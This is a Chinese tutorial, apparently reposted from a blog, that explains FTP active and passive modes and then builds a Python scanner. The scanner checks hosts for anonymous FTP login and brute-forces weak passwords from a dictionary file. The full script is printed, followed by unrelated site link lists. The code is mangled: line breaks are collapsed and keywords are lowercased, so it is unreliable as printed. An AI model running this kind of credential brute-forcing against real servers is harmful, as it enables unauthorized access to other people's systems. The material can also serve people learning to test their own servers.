Python实现FTP弱口令扫描器的方法示例(Python实现FTP弱口令扫描器的方法示例)
Python实现FTP弱口令扫描器的方法示例
Python实现FTP弱口令扫描器的方法示例ftp服务器
ftp服务器是在互联网上提供文件存储和访问服务的计算机,它们依照ftp协议提供服务。ftp是file transfer protocol(文件传输协议)的缩写。顾名思义,就是专门用来传输文件的协议,简单地说,支持ftp协议的服务器就是ftp服务器
ftp是仅基于tcp的服务,不支持udp(想想也是,传输文件,肯定要稳定可靠,建立连接,所以不支持udp)。与众不同的是ftp使用2个端口,一个数据端口,一个命令端口(也叫控制端口)。通常来说这两个端口分别是21(命名端口)和20(数据端口)。但由于ftp工作方式的不同,数据端口并不总是20.这就是主动与被动ftp的最大不同之处。
- 主动ftp
ftp服务器的控制端口是21,数据端口是20,所以在做静态映射的时候只需开放21端口即可,他会用20端口和客户端主动发起连接
- 被动ftp
服务器的控制端口是21,数据端口是随机的,且是客户端去连接对应的数据端口,所以在做静态映射的话只开放21端口不可以的
ftp扫描的实现方案
扫描匿名ftp
ftp匿名登陆的扫描主要应用与批量扫描中,单独针对一个ftp服务器进行扫描的话成功率比较小。很多网站都开放ftp服务方便用户下载资源(这个允许匿名登陆不足为奇),更疯狂的是网站管理人员为了方便网站访问软件的更新也开放了ftp匿名登陆,这样就给了我们很多机会,尤其后者的服务器很容易受到攻击
扫描ftp弱口令
弱口令扫描其实就是暴力破解,不过我们只是扫描一些简单的密码组合,并不是所有可能的密码组合
步骤
ftp匿名扫描器的实现
这里需要用到python的 ftplib 库中的ftp这个类,这个类实现了ftp客户端的大多数功能,比如连接ftp服务器、查看服务器中的文件、上传、下载文件等功能,详细用法可以查看api,接下来我们首先定义 anonscan(hostname) 这个函数以实现扫描可匿名登陆的ftp服务器。代码如下:
|
def anonscan(hostname): # 参数是主机名 try : with ftp(hostname) as ftp: # 创建ftp对象 ftp.login() # ftp匿名登陆 print ( "\n[*]" + str (hostname) + " ftp anonymous login successful!" ) return true except exception as e: # 抛出异常表示匿名登陆失败 print ( "\n[-]" + str (hostname) + " ftp anonymous login failure!" ) return false |
代码很简短,注释也写的很清楚。这里还是说一下函数的思路,首先用主机名构造了一个ftp对象(即ftp),然后用ftp调用不带参数的login()函数即表示要匿名登陆这个ftp服务器,如果登陆过程中没有产生异常,则表明匿名登陆成功,否则匿名登陆失败
ftp弱口令的扫描
ftp弱口令扫描依赖于用户名和密码字典,密码字典 下载 ,下载之后我们将其命名为 pwd.txt
接下来针对字典中的格式来实现ftp弱口令扫描,创建代码文件 ftpscanner.py ,代码如下:
|
def vlclogin(hostname, pwdfile): # parameters (hostname, dictionary file) try : with open (pwdfile, 'r' ) as pf: # open dictionary file for line in pf.readlines(): username = line.split( ':' )[ 0 ] # fetch username password = line.split( ':' )[ 1 ].strip( '\r' ).strip( '\n' ) # fetch password print ( '[+] trying: ' + username + ':' + password) try : with ftp(hostname) as ftp: ftp.login(username, password) print ( '\n[+] ' + str (hostname) + ' ftp login successful: ' + \ username + ':' + password) return (username, password) except exception as e: # continue trying other usernames and passwords pass except ioerror as e: print ( 'error: the password file does not exist!' ) print ( '\n[-] cannot crack the ftp password, please change the password dictionary try again!' ) return (none,none) |
这段代码其实就是循环从字典中读取用户名和密码并尝试登陆,登陆成功则表明找到用户名和密码。由于这个函数将主机名定义成了可以用 , 分割的字符串。找到密码并不会终止程序,而是会继续扫描其他主机的弱口令,直到所有的主机都扫描一遍
命令行解析
至此,ftp扫描器几乎已经完成了,现在我们要做的是让我们的脚本可以处理命令行输入,以控制扫描哪些主机。命令行参数我们将用到python中的 argparse 库。
|
parser = argparse.argumentparser(description = 'ftp scanner' ) parser.add_argument( '-h' ,dest = 'hostname' , help = 'the host list with ","space' ) parser.add_argument( '-f' ,dest = 'pwdfile' , help = 'password dictionary file' ) options = none try : options = parser.parse_args() except : print (parser.parse_args([ '-h' ])) exit( 0 ) hostnames = str (options.hostname).split( ',' ) pwdfile = options.pwdfile |
整合全部代码
|
# -*- coding: utf-8 -*- from ftplib import * import argparse import time # anonymous login scan def anonscan(hostname): # the parameter is the host name try : with ftp(hostname) as ftp: # create ftp object ftp.login() # ftp anonymous login print ( "\n[*]" + str (hostname) + " ftp anonymous login successful!" ) return true except exception as e: # throwing an exception indicates that the anonymous login failed print ( "\n[-]" + str (hostname) + " ftp anonymous login failure!" ) return false # brute force def vlclogin(hostname, pwdfile): # parameters (hostname, dictionary file) try : with open (pwdfile, 'r' ) as pf: # open dictionary file for line in pf.readlines(): username = line.split( ':' )[ 0 ] # fetch username password = line.split( ':' )[ 1 ].strip( '\r' ).strip( '\n' ) # fetch password print ( '[+] trying: ' + username + ':' + password) try : with ftp(hostname) as ftp: ftp.login(username, password) print ( '\n[+] ' + str (hostname) + ' ftp login successful: ' + \ username + ':' + password) return (username, password) except exception as e: # continue trying other usernames and passwords pass except ioerror as e: print ( 'error: the password file does not exist!' ) print ( '\n[-] cannot crack the ftp password, please change the password dictionary try again!' ) return (none,none) def main(): parser = argparse.argumentparser(description = 'ftp scanner' ) parser.add_argument( '-h' ,dest = 'hostname' , help = 'the host list with ","space' ) parser.add_argument( '-f' ,dest = 'pwdfile' , help = 'password dictionary file' ) options = none try : options = parser.parse_args() except : print (parser.parse_args([ '-h' ])) exit( 0 ) hostnames = str (options.hostname).split( ',' ) pwdfile = options.pwdfile if hostnames = = [ 'none' ]: print (parser.parse_args([ '-h' ])) exit( 0 ) for hostname in hostnames: username = none password = none if anonscan(hostname) = = true: print ( 'host: ' + hostname + ' can anonymously!' ) elif pwdfile ! = none: (username,password) = vlclogin(hostname,pwdfile) if password ! = none: print ( '\n[+] host: ' + hostname + 'username: ' + username + \ 'password: ' + password) print ( '\n[*]-------------------scan end!--------------------[*]' ) if __name__ = = '__main__' : main() |
测试扫描
至此就可以测试我们的ftp弱口令扫描器了,在命令行中输入
|
python ftpscanner.py - h 127.0 . 0.1 - f pwd.txt |
因为我本地并没有开启ftp服务,所以扫描不成功,大家可以尝试在服务器上开放ftp服务,然后进行测试,绝对不能用于非法用途
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持开心学习网。
原文链接:https://www.wmathor.com/index.php/archives/1188/
- python远程下发shell指令(Python实现堡垒机模式下远程命令执行操作示例)
- python如何读取文件(Python从文件中读取数据的方法讲解)
- python交互模式下如何开始运行(python交互界面的退出方法)
- python怎么用代码写出心形(六行python代码的爱心曲线详解)
- python怎么自动刷抖音(python实现抖音点赞功能)
- python中的类和对象的定义和使用(Python类的继承、多态及获取对象信息操作详解)
- python3 for循环怎么用(Python3.5基础之变量、数据结构、条件和循环语句、break与continue语句实例详解)
- python编写自动发送微信信息(python实现向微信用户发送每日一句 python实现微信聊天机器人)
- python序列化图解(对Python3 序列解包详解)
- 百度免费翻译接口(基于python实现百度翻译功能)
- python异常信息处理(Python使用修饰器进行异常日志记录操作示例)
- python统一支付接口(Python实现的微信支付方式总结三种方式)
- python字典的key(Python使用dict.fromkeys快速生成一个字典示例)
- jupyter如何编写python(windows系统中Python多版本与jupyter notebook使用虚拟环境的过程)
- python创建文件夹(python批量创建指定名称的文件夹)
- python模块化打包(python使用Paramiko模块实现远程文件拷贝)
- 沪上这16所高校 萌新 礼包开箱 哪一款让你心动(沪上这16所高校萌新)
- 她救了被绑架的他,而这一切竟是一场阴谋...(她救了被绑架的他)
- 冬季养殖这6种阴生植物,方便又好养,你家有么(冬季养殖这6种阴生植物)
- 阴生植物为什么不怕照不到阳光(阴生植物为什么不怕照不到阳光)
- 阴生环境 耐阴地被植物,你知道哪些(阴生环境耐阴地被植物)
- 常见的喜阴植物有哪些 养室内盆栽就在这里选(常见的喜阴植物有哪些)
热门推荐
- apache虚拟域名配置(Apache虚拟主机的配置和泛域名解析实现代码)
- 织梦dedecms开启付费授权(修改织梦DedeCMS广告模块后,前台显示未更新的解决方法)
- angularjs数据绑定类指令及作用(详解Angular数据绑定及其实现方式)
- 微信html5页面怎么制作(HTML5中外部浏览器唤起微信分享功能的代码)
- nginx 根据url限流(浅谈Nginx 中的两种限流方式)
- phpstudy详细教程学习(phpstudy的php版本自由修改的方法)
- sqlserver仲裁状态(使用 SQL 服务器时,"评估期已过期"错误消息解决方法)
- jQuery如何操作下拉框select
- vue组件滚动加载教程(Vue组件封装上传图片和视频的示例代码)
- react native常用组件(react native环境安装流程)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9